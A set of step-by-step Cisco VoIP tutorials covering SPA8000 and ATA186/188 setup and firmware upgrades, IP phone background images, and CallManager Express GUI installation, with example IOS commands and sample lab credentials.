While purchasing one or two ATA devices might be acceptable for up to two or four analog phones, this quickly becomes a very expensive practice for any additional FXS ports. Thankfully, there is a cheaper solution – the Cisco Linksys SPA8000.

The Cisco SPA8000 is an 8-port IP Telephony Gateway that allows connections for up to eight analog telephones (provides 8 FXS ports) to an IP-based data network. What many engineers are not aware of is that the SPA8000 can also be configured to connect to Cisco's CallManager Express or Cisco UC500 series IP Telephony system, decreasing dramatically the cost per FXS analog port of your VoIP network.

This article examines the necessary steps and configuration required to successfully connect a SPA8000 to a CallManager Express system.  The commands covered are identical to CallManager Express and all UC 500 series IP PBX systems (520, 540 & 560).

cisco-voice-uc500-ccme-spa8000-1

The diagram above shows the physical connection of the solution. The SPA8000, just like any VoIP device, is configured and connected to a network switch and assigned to VLAN2, the Voice VLAN in our example. By doing so, the SPA8000 is able to communicate with CallManager Express using the SIP Protocol as shown below.  On the back of the SPA8000, we've connected simple analog phones to FXS ports provided. These phones can be placed in areas where there is no need for the more expensive Cisco IP Phones, usually public areas, production environments etc.  Note that these analog phone devices can also be wireless analog phones.

Upgrading The Cisco SPA8000 Firmware

We highly recommend upgrading the SPA8000 to the latest available firmware version. This practice usually provides new features and greater stability of the unit. This simple-to-follow process has been extensively covered in our Cisco SPA8000 Firmware Upgrade article.

Configuring The SPA8000 IP Address

To avoid network problems, it is important to ensure the SPA8000 is configured to be in the same network as the CallManager Express or UC500 – in other words, the same VLAN (Voice).  In the SPA8000 NetworkWAN Status tab, always ensure the Connection Type is set to Static and appropriate IP Address, Gateway and DNS Server is provided:

cisco-voice-uc500-ccme-spa8000-3

Configuring The SPA8000 FXS Ports For SIP Registration With CallManager Express / UC500, UC520, UC540, UC560

On the main Voice configuration tab, the SPA8000 lines are configured on tabs L1 through L8.  To enable a line, for example L1 which corresponds to FXS port 1, click on the L1 tab and set Line Enable to YES:

cisco-voice-uc500-ccme-spa8000-4

 Next, we need to configure the following settings:

  • Proxy:  IP Address of our CCME or UC500 series IP PBX
  • Register: Enable registration of the line with CallManager Express or UC500
  • Make/Ans Call Without Reg: Always force the line to be registered with CCME or UC500 to place or answer a call
  • Display Name:  Caller ID for the extension. This is the Caller ID other extensions will see when we dial from this line
  • User ID: The line’s extension number e.g 139
  • Auth ID & Password:  Username and password combination for this line.  We use cisco / firewallcx
  • Use Auth ID: Enable authentication for this line.

It is important to note that the same Auth ID & Password is used for all configured lines, that is, L1 though L8.

cisco-voice-uc500-ccme-spa8000-5

At this point, we have completed the SPA8000 configuration and are ready to move to CallManager Express or UC500 configuration.

Configuring CallManager Express & UC500 (UC520, UC540, UC560) SIP Registration For SPA8000

On the CallManager Express side, the SIP CME feature is used to register the SPA8000 as a generic SIP endpoint, allowing each configured line (on the SPA8000) to register with CCME.

First, we create a voice class codec that will define the voice codecs that can be used by CallManager Express and SPA8000:

CCME(config)# voice class codec 1
CCME(config-class)# codec preference 1 g711ulaw
CCME(config-class)# codec preference 2 g729r8

Next, we enable the SIP registrar server on our CallManager Express:

CCME(config)# voice service voip
CCME(conf-voi-serv)# sip
CCME(conf-serv-sip)#  registrar server
CCME(conf-serv-sip)#  exit

Now we need to define the global voice register parameters:

CCME(config)# voice register global
CCME(config-register-global)# mode cme
CCME(config-register-global)# source-address 10.10.100.10 port 5060
CCME(config-register-global)# max-dn 10
CCME(config-register-global)# max-pool 10

The source IP Address used here is that of the CallManager Express or UC500 Voice VLAN interface.

Now configure the extension number for each FXS port on our SPA8000:

CCME(config)# voice register dn  1
CCME(config-register-dn)# number 139
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  2
CCME(config-register-dn)# number 140
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  3
CCME(config-register-dn)# number 141
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  4
CCME(config-register-dn)# number 142
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  5
CCME(config-register-dn)# number 143
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  6
CCME(config-register-dn)# number 144
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  7
CCME(config-register-dn)# number 145
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  8
CCME(config-register-dn)# number 146
CCME(config-register-dn)# no-reg

Finally, we must create a registration pool for our SPA8000 lines. One pool only is required. Note that the MAC Address configured is that of our SPA8000:

CCME(config-register-dn)# voice register pool  1
CCME(config-register-pool)# id mac 687F.7459.85EC
CCME(config-register-pool)# number 1 dn 1
CCME(config-register-pool)# number 2 dn 2
CCME(config-register-pool)# number 3 dn 3
CCME(config-register-pool)# number 4 dn 4
CCME(config-register-pool)# number 5 dn 5
CCME(config-register-pool)# number 6 dn 6
CCME(config-register-pool)# number 7 dn 7
CCME(config-register-pool)# number 8 dn 8
CCME(config-register-pool)# dtmf-relay rtp-nte
CCME(config-register-pool)# voice-class codec 1
CCME(config-register-pool)# username cisco password firewallcx
CCME(config-register-pool)# no vad
The  number 1 dn 1 command configures the extension assigned to Line 1/FXS Port 1. Likewise, the number 2 dn 2 command configures the extension assigned to Line 2 /FXS Port 2and so on. Lastly, note the username and password combination used for all lines.

At this point, the configuration is complete and the SPA8000 should start registering its 8 lines to CallManager Express.

Directory numbers assigned to the SPA8000 (139 through 146 in our example) should not be assigned as directory numbers to other IP Phones.

If we pick up a Cisco IP Phone and dial extension 139, the analog phone connected to Line 1 on our SPA8000 should ring.

Allowing Direct Transfers To SPA8000 Extensions

When using the SPA8000 most engineers are faced with a common problem:  Incoming calls cannot be transferred to the extensions assigned to the SPA8000’s lines. 

For example, we have an incoming call answered by the receptionist.  The receptionist now needs to transfer the call to extension 139, so he presses the Transfer button and enters 139 and receives a beeping busy-signal, even though extension 139 is on-hook (not talking). 

This is because extensions 139 through 146 are not directly registered with the Cisco CallManager system using the SCCP  (Skinny) protocol as normal Cisco IP Phones usually are. Extensions 139 through 146 are registered via SIP Protocol and are handled differently.

To overcome the direct transfer limitation described, we need to instruct the CallManager Express to allow the transfer of calls to the extensions assigned to our SPA8000’s lines. 

The configuration below enables direct transfers to all SIP extensions configured in our example setup:

CCME(config)# telephony-service
CCME(config-telephony)# transfer-pattern 139
CCME(config-telephony)# transfer-pattern 140
CCME(config-telephony)# transfer-pattern 141
CCME(config-telephony)# transfer-pattern 142
CCME(config-telephony)# transfer-pattern 143
CCME(config-telephony)# transfer-pattern 144
CCME(config-telephony)# transfer-pattern 145
CCME(config-telephony)# transfer-pattern 1

This completes the configuration of CallManager Express and UC500 series IP PBX systems to allow the connection and registration of Cisco SPA8000 in order to provide a cheap alternative for analog FXS ports.



  • Hits: 40020

How To Upgrade Cisco - Linksys SPA8000 Firmware

The Cisco - Linksys SPA8000 is an 8-port IP Telephony Gateway that allows connections for up to eight analog telephones (provides 8 FXS ports) to a VoIP network using the Session Initiation Protocol (SIP).

This article covers extensively the upgrade process of the Cisco SPA8000 firmware so it can run the latest available version.

Upgrading The Cisco Linksys SPA8000 Firmware

Before any configuration is performed on the Cisco SPA8000, it is important to proceed with the upgrade of its firmware,to the latest available version. At the time of writing the latest firmware was released 6.1.10 (001) dated 6th May 2011 – Filename SPA8000_6.1.10.zip.  To save time and trouble, we’ve also made the firmware available at our Cisco Downloads section.

Upgrading the SPA8000 firmware is a very simple process. Download and unzip the provided file (2.13MB). Inside, we will find 3 files:

cisco-voip-spa8000-upgrade-1

The spa8000-6-1-10-001.bin file is the firmware that will be loaded on to the SPA8000, the spa8000_rn_v6-1-10.pdf contains the release notes and upg-spa8000-6-1-10-001.exe is the firmware upgrade program.

At this point, we run the upg-spa8000-6-1-10-001.exe executable and are presented with a window similar to this one:

cisco-voip-spa8000-upgrade-2

At this point, we enter the IP Address of the SPA8000 to be upgraded, in the provided field and click on OK. The application provides the ability to select a different source IP Address in case there are multiple network interface cards or multiple IP Addresses bound to the workstation. 

It is possible that a username and password will be requested by the program so it can log into the SPA8000, so we need to ensure this this information is available before the upgrade process begins.

Once the firmware upgrade has successfully completed, the SPA8000 will reboot, resetting the device to its default settings.  Note that the SPA8000 default IP Address will be 192.168.0.1, default username admin and no password.

As soon as the SPA8000 reboots with its new firmware, we can enter the web administration and configure the necessary IP Address, subnet mask, default gateway and DNS servers.

The screen below confirms the firmware upgrade and settings:

cisco-voip-spa8000-upgrade-3

This concludes our article covering how to upgrade the firmware on a Cisco - Linksys SPA8000 device.

  • Hits: 39099

How to Upgrade - Update Cisco ATA186 / 188 Firmware and Reset to Factory Default

The Cisco ATA 186/188 device is well known amongst any Cisco VoIP engineer. It is used allow analog phone devices to connect to the VoIP network and function as they would normally do with any other PBX.  The Cisco ATA186 / 188 was (and still is) one of the most useful (and cheapest) devices for any VoIP Network.  Many companies use the Cisco ATA in areas such as production lines and public areas, where expensive Cisco IP Phones are not required.

As noted, there are two different models, the Cisco ATA 186 & 188. One of the major differences between the two models is that the Cisco ATA 188 has two RJ-45 10/100Mbps Ethernet ports, whereas the Cisco ATA 186 has only a single 10Mbps Ethernet port. One of the ports on the Cisco ATA 188 is an uplink port (connects to the switch), and the other one is a data port, allowing you to connect another network device e.g workstation or network printer, just as you would do with a Cisco IP Phone that has two Ethernet ports e.g Cisco 7911G, 7945G e.t.c.

cisco-voice-ata186-188

Both models have two FXS interfaces (shown above, on the right side behind each ATA) which are used to connect two standard analog telephones or fax machines. The Cisco ATA is connected to the network via an Ethernet interface (uplink port) and can be configured via DHCP or manually. The Cisco ATA needs a 5V DC external power supply to operate . It is important to add that the Cisco ATA 186 & 188 device does not support Inline Ethernet power or Power over Ethernet (PoE).

Upgrading the Cisco ATA 186 - 188 Firmware

As with most IP Phones and VoIP network devices, the Cisco ATA firmware should be periodically updated to the latest available version. This will help ensure smooth operation and most importantly, fix any bug issues that might be present in older firmware versions.

Upgrading the Cisco ATA firmware is a fairly straight-forward process and won't require too much effort, as long as all described steps are followed. At the time of writing this article, the latest available firmware for the Cisco ATA 186 - 188 is version 3.2(4) (file name ata_03_02_04_sccp_090202_a.zip ) with release date 23/2/2009.  For the purpose of this article, this image has been made available from our Cisco IP Phone & ATA Firmware Download Section section. It is important to note that the upgrade procedure is the same for the SCCP (Skinny Protocol), SIP and H.323 firmware.

Firstly download and upzip the file in a directory, preferably c:\ata .  The zip file contains 32 files of which two are the ones we are mostly interested in and these are:

- sata186us.exe 72Kb.   This executable will serve the firmware to the ATA, so it may upload and install it.
- ATA030204SCCP090202A.zup 273Kb.  This is the firmware file for the ATA device.

To begin, open a DOS prompt and switch to the directory where you have unzipped the downloaded zip file. We assume this is the C:\ata directory. Once there, run the sata186us.exe executable with the following parameters:

c:\ata>sata186us -any -d1 ATA030204SCCP090202A.zup

Note: To complete the ATA Firmware upgrade, we will require a analog phone connected to the Phone 1 port of the Cisco ATA device. The phone will be used later on to initiate the firmware upgrade.

This command will start the server and being serving the firmware file to any ATA that connects to it. The -any parameter will allow the upgrade even if the software version is less than or equal to those of the client box. The -d1 parameter sets the verbose level for debugging to 1 (out of 3). This is handy as the server will provide enough debug output to allow tracking of the process.

Once the above command is executed, the server will begin serving the firmware file to any ATA that requests it. The service runs (listens) on UDP port 8000 and the Data Stream (transfer of firmware) on UDP port 8500, so it is important these ports are not blocked by any firewall or antvirus system or else the upgrade will fail.

Following is the output when running the sata186us executable as shown above:

sata186us version 3.1
Using Host: Firewall-cx with IP: 10.0.0.90 as upgrade server
This machine IP: 10.0.0.90
Upgrade Server Port: 8000
Data stream 0 port: 8500
        image found: code -- ata186.itsp2.v3.2

Using dialpad of your telephone (attached to your ATA box),
press ATA button to go to main menu, and enter:

        100#10*0*0*90*8000#     (to upgrade code)

NOTE:
Pressing 123# will announce your code's version number.
You can later verify that you have upgraded your ATA box.

-------------------------------------------

This program runs continuously; Press <ctrl>-c to abort.
Upgrade server ready...

The most important areas have been highlighted for your attention. The server will automatically detect and display the workstation's IP address on which it will listen for incoming connections, followed by the ports used to listen and transfer the data stream (firmware).

At this point, we need to turn to the Cisco ATA device, pickup the headset and press the ATA button on the top. This button lights 'RED' when the handset goes to a 'offhook' status e.g the headset is picked up.  Once the red ATA button is pressed, type the sequence as shown and keep the headset to your ear:

100#10*0*0*90*8000#

Note that the 10*0*0*90 code represents our workstation's IP address, so this will need to be substituted with your own workstation's IP address.

As soon as this command is entered via the dialpad, the ATA will initiate the firmware transfer and proceed to its upgrade.  During this time, expect a debug on the screen, similar to the following:

Wed Nov 16 12:49:19 2011 10.0.0.21      -> <udp: 10.0.0.90 8500 123>
Begin uploading code to 10.0.0.21 (Wed Mar  30 12:49:19 2012) ...
Done uploading code to 10.0.0.21 (Wed Mar 30 12:49:22 2012)


The firmware transfer will not require more than 10-15 seconds at the most and once successful you will hear the annoucement "Upgrade Successful".  It's a great idea at this point to reboot the Cisco ATA device and let it boot with the new firmware.

Checking and Verifying the Cisco ATA 186 - 188 Firmware Version

To verify or find out your current ATA firmware version, simply follow these easy steps:

1) Take the phone off hook.
2) Press 123# and listen to the annoucement. You will hear your code's version number.
3) Hang up the phone.

Resetting The Cisco ATA 186 - 188 Device To Factory Default

The Cisco ATA device offers a simple mechanisim to perform a factory default reset, wiping clean all configuration changes that might have been made through the web administrative interface.

To perform a factory reset of a Cisco ATA 186 - 188, follow the steps below:

1) Take the phone off hook.
2) The red button on the top of the ATA-186 / 188 will illuminate.
3) Press the illuminating red button on the ATA and dial 322873738#. (The numbers spell FACTRESET# on the telephone)
4) Voice prompt will ask you to dial * to save changes you have just made.
5) Press * on your phone's keypad.
6) Hang up the phone.

The Cisco ATA will now reset to its factory defaults.

  • Hits: 60915

CallManager Express & UC500 Series: Changing Background Images on a Cisco IP Phone

Cisco's CallManager Express (Cisco router platform & UC520, UC540 & UC560) offers a number of customisation features aimed to allow the CCME administrator customise the system to suite the customer's needs.

One popular feature is the ability to change the IP Phone's background image for IP Phones with colour or black/white LCD displays. This feature helps give a new look to the IP phone and usually comes as a pleasant surprise by the end users.

IP Phone background images are files using the .png format and are stored on the router's flash memory in a special directory named 'Desktops'.

Cisco usually provides a .zip file for each CallManager Express version. This file contains IP Phone firmware, ringtones, GUI Interface and more (Links to the download pages can be found from our CCME GUI Software Installation & Configuration article). Within each CCME zip file, you'll find a file named 'backgrounds.tar' which contains total of 6 colour backgrounds to start you off with.

Firewall.cx has made the Cisco IP Phone 'backgrounds.tar' file & custom Firewall.cx background image, available in our Cisco IP Phone Software download section.

Following are thumbnails of the backgrounds provided by Cisco. These are the background images found in 'backgrounds.tar':

tk-cisco-ccme-ipphone-bgnd-1 tk-cisco-ccme-ipphone-bgnd-2tk-cisco-ccme-ipphone-bgnd-3  tk-cisco-ccme-ipphone-bgnd-4  tk-cisco-ccme-ipphone-bgnd-5  tk-cisco-ccme-ipphone-bgnd-6

Below is the standard background image loaded on every 7945, 7965, 7970 & 7975 IP Phone:

tk-cisco-ccme-ipphone-bgnd-7

Installing the background images is a straight forward process. All that's required is to extract the 'backgrounds.tar' file directly on to the router's flash and make them available to your IP phones via the router's TFTP server.

Step 1 - Extracting the Files on to the Router's Flash

Note that there must be a TFTP server running on the workstation from where the 'backgrounds.tar' will be uploaded and extracted to the router. Enter the command to extract the 'backgrounds.tar' file from the TFTP server, directly on to the router's flash. This will also create the directory structure in the .tar file:

R1# archive tar /xtract tftp://10.0.0.10/backgrounds.tar flash:
Loading backgrounds.tar from 10.0.0.10 (via FastEthernet0/0): !
Desktops/ (directory)
Desktops/320x212x12/ (directory)
extracting Desktops/320x212x12/CampusNight.png (131470 bytes)
extracting Desktops/320x212x12/CiscoFountain.png (80565 bytes)
extracting Desktops/320x212x12/CiscoLogo.png (8156 bytes)
extracting Desktops/320x212x12/Fountain.png (138278 bytes)!
extracting Desktops/320x212x12/List.xml (726 bytes)
extracting Desktops/320x212x12/MorroRock.png (109076 bytes)
extracting Desktops/320x212x12/NantucketFlowers.png (108087 bytes)!
extracting Desktops/320x212x12/TN-CampusNight.png (10820 bytes)
extracting Desktops/320x212x12/TN-CiscoFountain.png (9657 bytes)
extracting Desktops/320x212x12/TN-CiscoLogo.png (2089 bytes)
extracting Desktops/320x212x12/TN-Fountain.png (7953 bytes)
extracting Desktops/320x212x12/TN-MorroRock.png (7274 bytes)
extracting Desktops/320x212x12/TN-NantucketFlowers.png (9933 bytes)
Desktops/320x216x16/ (directory)
extracting Desktops/320x216x16/List.xml (726 bytes)
Desktops/320x212x16/ (directory)
extracting Desktops/320x212x16/List.xml (726 bytes)
[OK - 641024 bytes]
R1#

Extraction of the 'backgrounds.tar' file will create a root 'Desktops' directory. Under this directory, three directories are created: 320x212x12, 320x216x16 & 320x212x16. The code-naming of these directories relate to the resolution of the images they contain (e.g 320x212) and colour resolution (e.g x12). As such, different IP Phones models will look into the appropriate directory to find image files suited for their LCD screen.

For example, a Cisco CP-7965 IP phone will automatically search in the Desktops/320x212x16/ directory for a list of image files.

In each directory (e.g 320x212x12) there are three type of files found:

1) imagename.png

2) TN-imagename.png

3) List.xml

It is very important to understand the purpose of each file. Please note that filenames are case-sensitive in the Cisco IOS.

  • The imagename.png file is the image the IP phone will load when selected as a new background.
  • The TN-imagename.png file is the thumbnail version of imagename.png. When a user selects the Background Images menu, he will be presented with the thumbnail version of available images. If the thumbnail file for a specific image does not exist, a portion of the full-resolution image will be displayed instead.
  • The List.xml file is a xml file that contains the path and list of the available images and their thumbnails. The List.xml file can include up to 50 background images. The images are in the order that they appear in the Background Images menu on the phone.

For each image, the List.xml file contains one element type, called Image Item. The Image Item element includes the following two attributes:

a) Image. The path that specifies where the phone obtains the thumbnail image

b) URL. The location of the actual image file

Below is an example of the List.xml file, showing the location of the thumbnail and full resolution image of CampusNight.png:

<ImageItem Image="TFTP:Desktops/320x212x12/TN-CampusNight.png"
URL="TFTP:Desktops/320x212x12/CampusNight.png"/>

The List.xml file is the same file for all three directories. If an additional background image is uploaded on to the system, you must edit the List.xml file and upload it to all three directories, overwriting the existing file.

Essentially all images are stored into one directory (usually Desktops/320x212x12) and all IP phones are directed to that directory through the List.xml files.

Step 2 - Serving The Files To Our IP Phones

Once the files are loaded on the CME router, it is necessary to enter the appropriate tftp-server commands to load List.xml and all .png files and make them available to the IP phones:

tftp-server flash:Desktops/320x212x12/CampusNight.png
tftp-server flash:Desktops/320x212x12/CiscoFountain.png
tftp-server flash:Desktops/320x212x12/MorroRock.png
tftp-server flash:Desktops/320x212x12/NantucketFlowers.png
tftp-server flash:Desktops/320x212x12/Fountain.png
tftp-server flash:Desktops/320x212x12/CiscoLogo.png
tftp-server flash:Desktops/320x212x12/TN-CampusNight.png
tftp-server flash:Desktops/320x212x12/TN-CiscoFountain.png
tftp-server flash:Desktops/320x212x12/TN-MorroRock.png
tftp-server flash:Desktops/320x212x12/TN-NantucketFlowers.png
tftp-server flash:Desktops/320x212x12/TN-Fountain.png
tftp-server flash:Desktops/320x212x12/TN-CiscoLogo.png
tftp-server flash:Desktops/320x212x12/List.xml
tftp-server flash:Desktops/320x216x16/List.xml
tftp-server flash:Desktops/320x212x16/List.xml

Inserting Custom Background Images

As in most cases, you would want to load your own custom images. For example, we created our own Firewall.cx background image and loaded it on to our IP phones.

Here's the necessary procedure and final result:

1) Create an .png image with dimensions 320x212. We did not bother creating the thumbnail version:

tk-cisco-ccme-ipphone-bgnd-8

2) Edit the List.xml and append the newly created image:

<ImageItem Image="TFTP:Desktops/320x212x12/firewall-cx-logo.png"
URL="TFTP:Desktops/320x212x12/firewall-cx-logo.png"/>

3) Load the image into the 'Desktops/320x212x12/' directory.

R1# copy tftp flash://Desktops/320x212x12/
Address or name of remote host []? 10.0.0.10
 Source filename []? firewall-cx-logo.png
 Destination filename [/Desktops/320x212x12/firewall-cx-logo.png]? [hit enter]
Accessing tftp://10.0.0.10/firewall-cx-logo.png...
 Loading firewall-cx-logo.png from 10.0.0.10 (via FastEthernet0/0): !
 [OK - 34493 bytes]

34493 bytes copied in 0.792 secs (43552 bytes/sec)

4) Load the modified List.xml file into all three directories (320x212x12, 320x212x16 & 320x216x16), overwriting the existing file. We only show the process for one of the three directories:

R1# copy tftp flash://Desktops/320x212x12/
Address or name of remote host [10.0.0.10]? [Hit enter]
Source filename [firewall-cx-logo.png]? List.xml
 Destination filename [/Desktops/320x212x12/List.xml]? [Hit enter]
%Warning:There is a file already existing with this name
Do you want to over write? [confirm] [Hit enter]
Accessing tftp://10.0.0.10/List.xml...
 Loading List.xml from 10.0.0.10 (via FastEthernet0/0): !
 [OK - 845 bytes]

845 bytes copied in 0.440 secs (1920 bytes/sec)

5) Enter the appropriate tftp-server commands to load the new image file and make it available to the IP phones to download:

R1(config)# tftp-server flash:Desktops/320x212x12/firewall-cx-logo.png

We are now ready to load the new background image on to our IP phone by selecting Settings > UserPreferences > Background Images> .

Notice that the IP phone will show a thumbnail version which essentially is our background image - cropped. This is because we did not create a proper thumbnail version of the background image.

Once we select the new file and save our selection, the IP phone will display it. Below if the final result on our 7945G IP phone:

tk-cisco-ccme-ipphone-bgnd-9

Firewall.cx has made the Cisco IP Phone 'backgrounds.tar' file & custom Firewall.cx background image, available in our Cisco IP Phone Software download section.

Be sure to install the backgrounds.tar file mentioned at the beginning of this article, to create the necessary directory structure on your router's flash.

Summary

In this article we explained how to install/load background images on Cisco IP phones. We examined the files involved and the procedure that needs to be followed to create and load custom background image files. Lastly, we also provide as a free download, our custom made Firewall.cx background image and Cisco's standard images.

 

  • Hits: 61436

CallManager Express GUI Software Installation & Configuration - Part 2

This article covers the installation of Cisco's CallManager Express on Cisco routers. Here you'll find the necessary installation commands, files to download, router's HTTP server configuration commands along side with the commands to activate the web CME interface and access it via a web browser.

Installing the CallManager Express GUI Files

As mentioned in our previous article CallManager Express GUI Software Installation & Configuration - Part 1, we'll be installing the file containing the basic CallManager GUI files. This is a common practice over the full version as free space on the system's flash is often a problem.

The 40MB .tar file (cme-basic-7.1.0.1.tar) should just about it on a system with a 128MB flash that already contains the Cisco IOS on it. While this file can be viewed using Winzip, it is intended to be extracted directly on to your CallManager platform using the CLI interface.

Using the necessary commands, the cme-full-7.1.0.1.tar file is extracted directly on to the device's flash memory. This means you must ensure you have enough free space on your router or UC500 flash, otherwise the extraction process will fail.

To extract the file, launch a TFTP server and ensure the file is accessible by the tftp server, then follow the below command:

R1# archive tar /xtract tftp://10.0.0.10/cme-basic-7.1.0.1.tar flash:
Loading cme-basic-7.1.0.1.tar from 10.0.0.10 (via FastEthernet0/0): !
extracting APPS-1.2.1.SBN (2593969 bytes)!!!!!!!!!!
extracting apps11.8-4-1-23.sbn (2925555 bytes)!!!!!!!!!!!

The 'archive tar /xtract' command tells the router or UC500 to load the .tar file from our tftp server and extract it directly on to the router's flash. In total, our example had 132 files of which only 18 are the essential GUI files.

Opening the .tar file using Winzip and locating the files with the path 'gui\' will reveal the GUI related files:

In the worst-case scenario, if there is limited space on the CallManager Express flash memory, simply extract the files with the 'gui\' path and upload them individually in the root directory of your flash memory.

Once uploaded on the router's flash, next step is to enable the router's http server, configure the authentication method, so that the router uses its local user accounts for authentication, and finally create a local user account with privilege 15 access and lower the file privilege level required for file operations. The file privilege command is necessary, otherwise we might experience telephony_service_server_get_action url:/ccme.html errors without any web page loading:

R1(config)# ip http server
R1(config)# ip http authentication local
R1(config)# username firewall privilege 15 secret mysecret
R1(config)# file privilege 0

Alternatively, for increased security, it is possible to specify a user that will only be used for the CallManager Express GUI interface. This user will not have any other type of access to the CCME router as it is not considered a 'local account':

R1# configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)# telephony-service
R1(config-telephony)# web admin system secret 0 mysecret

When entering the password or secret, type 0 reflects a non-encrypted password where as type 5 reflects an encrypted password.

We are now ready to access the Cisco CallManager Express GUI Interface using the following URL: http://10.0.0.1/ccme.html. This example assumes that the CallManager Express system is on IP address 10.0.0.1.

When typing the URL in our web browser, the system will request for a username and password. We enter the credentials accordingly and are presented with the CallManager Express homepage:

tk-cisco-ccme-gui-p2-2

From here, we are able to configure basic system parameters, ip phone devices, create and assign extensions, receive basic call reports and much more.

The scope of this article will cover as much as the basic system parameter since the rest will be covered in future articles.

The begin setting up the basic system parameters, select 'Configure > System Parameters'. This will load the system parameter page where a number of options are available:

tk-cisco-ccme-gui-p2-3

The most important parameters are outlined below:

  • Administrator's Login Account - create or reset new CCME GUI accounts.
  • Date and Time Format - The date/time format displayed on the IP Phones.
  • IP Phone URLs - The urls IP Phones must use in order to obtain access to advanced features such as XML services or Internet.
  • Max. Number of IP Phones - The maximum number of IP Phones allowed to register to our CCME system. This number cannot be more than the max. number of phones supported by the system.
  • System Message - The message or company name displayed on all IP Phones.
  • System Time - Allows the setting of year, month, day and time. If this option is not available, it will be necessary to enter the 'time-webedit' command under the 'Telephony-service' section using the CLI prompt.
  • Timeout - The number of seconds between interdigit timeout (how long the system will wait as a user is entering a phone number, before timing out), ringing and busy timeout.
  • Transfer Patterns. The pattern of destination phone number(s) allowed for transferring calls to external numbers. e.g to allow an incoming to call to be transferred to an external mobile (by placing another call), the mobile's number or pattern must be entered here, otherwise the system won't permit it.
  • MOH File - Music-On-Hold file. This is the music file played when a caller is placed on-hold. The file is sampled at 8Khz, mono, 8bit and saved using .wav A/mu-Law format.

As the parameters are set, the data entered are translated into CLI commands and placed under the 'Telephony-service' section of the router's or UC's configuration.

Below is the 'Telephony-service' configuration from a working CCME system. Notice that there are a lot more commands entered than available from the web interface, however it is fairly easy to locate the ones covered with the GUI interface. In-depth analysis and configuration of the telephony-service will be covered on another article:

R1# sh run | sec telephony-service
telephony-service
video
maximum bit-rate 300
max-ephones 30
max-dn 100
ip source-address 10.0.0.1 port 2000
auto assign 1 to 100
service phone videoCapability 1
timeouts interdigit 4
system message Firewall.cx
url services http://10.0.0.4/
network-locale GB
load 7914 S00104000100
load 7906 SCCP11.8-2-2SR1S
load 7911 SCCP11.8-2-2SR1S
load 7921 CP7921G-1.1.1
load 7931 SCCP31.8-2-2SR1S
load 7941 SCCP41.8-3-3S
load 7942 SCCP42.8-3-2S
load 7945 SCCP45.8-3-2S
load 7962 SCCP42.8-3-2S
load 7965 SCCP45.8-3-2S
load 7975 SCCP75.8-3-2S
time-zone 24
time-format 24
date-format dd-mm-yy
voicemail 88
max-conferences 8 gain -6
moh flash:north-gate.wav
multicast moh 239.10.16.4 port 2000
web admin system name admin secret 5 tLhc4.7jdhwlZp96HjC.
dn-webedit
time-webedit
transfer-system full-consult
transfer-pattern 4.
transfer-pattern 6948......
after-hours pstn-prefix 4 4
night-service code *1234
create cnf-files version-stamp Jan 01 2002 00:00:00

 Once complete, Cisco CallManager Express is ready to accept new IP phones and extensions.

As a last note, we should warn that Mozzila Firefox seems to have issues handing the javascript the GUI interface uses. This is especially evident when trying to assign extensions to physical IP phone buttons.

If you are using Mozzila Firefox and stumble into problems with the GUI interface, try switching to Internet Explorer - amazingly as it might sound, no problems have been encountered with it so far!

Summary

This article covered the Cisco CallManager Express GUI interface and how it relates to different IOS versions. We examined the CCME version contained in each IOS and where to obtain the necessary files.

We also saw the information contained in each CallManager Express specification page, how to select and download the appropriate CCME GUI files and what they contain.

Closing, we showed how to install the Cisco CallManager Express GUI files onto a Cisco router or UC500 series platform and provided the necessary commands required to get the GUI working. Basic system parameters were also covered, giving a view of the available options for Cisco CallManager Express.

  • Hits: 93956

CallManager Express GUI Software Installation & Configuration - Part 1

cisco-ccme-gui-part-1-1Cisco CallManager Express, also known as CME or CCME, runs on both Cisco ISR Routers and UC500 platform, including UC520, UC540 and UC560.

CallManager Express's PBX functionality is built into the IOS that runs on all the above devices. When the router or UC500 series device loads the IOS, the administrator is able to start configuring VoIP services as required.

One of the most common questions regarding CallManager Express configuration is what methods are available to actually configure the product?

Depending on the platform, there are currently up to three different ways to configure CallManager Express, . If CallManager Express is running on a ISR router (2800, 3800, 2900 & 3900 series routers) users, have the GUI Web and Command Line Interface (CLI) at their disposal, where as users on the UC500 platform have also got the Cisco Configuration Assistance (CCA) tool - an application that installs and runs on a workstation and guides you through a step-by-step menu to easily setup your VoIP PBX.

The common methods amongst the two platforms (ISR & UC500) is the Cisco CallManager Express Graphical User Interface and CLI interface. This article will explain how to install and configure the Cisco CallManager Express GUI but also cover the most important configuration options offered by it.

Matching IOS & GUI Files

Engineers who have dealt with Cisco CallManager Express will have noticed that its version changes depending on the IOS version. As noted in our Cisco CallManager Express introduction page (INSERT LINK), the CallManager Express service is embedded inside the Cisco IOS. The newer IOS, the newer CallManager Express version you get.

Remember that up to IOS version 12.4.26, only the following IOS's have the CallManager Express capabilities embedded:

- SP Services
- Adv. IP Services
- Adv. Enterprise Services

As of the latest major IOS Version, 12.5.x, Cisco has replaced all previous IOS's with one-universal IOS that has all previous IOS version features (12.4), but requires you to purchase the correct activation key to enable the additional services you need.

For example, VoIP Services such as CallManager Express are covered under the Unified Communications (UC) license. Purchasing and installing the UC activation license, will enable these features.

The table below illustrates the Cisco IOS releases, CallManager Express versioning and CallManager Express GUI version that should be used or installed on the device (router or UC500):

Cisco IOS Release
Cisco Unified CME Version
Cisco Unified CME GUI Version
Specifications Link
15.2(2)T 9.0 9.0.0.0 CME 9.0 Link
15.1(4)T
8.6
8.6.0.0
CME 8.6 Link
15.1(3)T
8.5
8.5.0.0
CME 8.5 Link
15.1(2)T
8.1
8.1.0.0
CME 8.1 Link
15.1(1)T
8.0
8.0.0.0
CME 8.0 Link
15.0(1) XA
8.0
8.0.0.0
CME 8.0 Link
15.0(1) M
7.1
7.1.1.0
CME 7.1 Link
12.4(24)T
7.1
7.1.0.0
CME 7.1 Link
12.4(22)T
7.0(1)
7.0.0.1
CME 7.0 Link
12.4(20)T
7.0
7.0.0.0
CME 7.0 Link
12.4(15)XZ
4.3
4.3.0.0
CME 4.3 Link
12.4(11)XW9
4.2
4.2.0.4
CME 4.2 Link
